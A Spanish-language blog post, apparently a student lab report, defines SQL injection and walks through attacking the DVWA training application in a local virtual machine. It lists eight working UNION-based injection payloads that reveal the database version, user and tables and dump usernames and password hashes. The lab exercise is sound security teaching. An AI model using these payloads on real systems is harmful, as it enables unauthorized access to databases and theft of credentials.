¿Que es SQL injection?
Es un método de infiltración de código intruso que se vale de una vulnerabilidad informática presente en una aplicación en el nivel de validación de las entradas para realizar operaciones sobre una base de datos.
El origen de la vulnerabilidad radica en el incorrecto chequeo o filtrado de las variables utilizadas en un programa que contiene, o bien genera, código SQL. Es, de hecho, un error de una clase más general de vulnerabilidades que puede ocurrir en cualquier lenguaje de programación o script que esté embebido dentro de otro.
Se conoce como Inyección SQL, indistintamente, al tipo de vulnerabilidad, al método de infiltración, al hecho de incrustar código SQL intruso y a la porción de código incrustado.
Para llevar acabo esta tarea, primero se instaló el virtual box, se procedió con su instalación y se inició la máquina virtual para poder visualizar la dirección IP.
Una vez obtenida la IP, se realizó los paso del articulo 7,8 y 9 de ESTE ARTÍCULO.
Entramos a la dirección 192.168.56.101/login.php
ID: admin
Password: password
Y entramos a la siguiente página.
Login DWA
Security Level
Una vez ahí hacemos click en DWA Security
Manual SQL Injection
Luego seleccionamos SQL Injection
Ingresamos los siguientes comandos de base de datos
- %' or '0'='0
- %' or 0=0 union select null, version() #
- %' or 0=0 union select null, user() #
- %' or 0=0 union select null, database() #
- %' and 1=0 union select null, table_name from information_schema.tables #
- %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
- %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
- %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
Conclusión: El servidor no esta protegido para este tipo de ataques, por lo cual revela información comprometedora.
No hay comentarios:
Publicar un comentario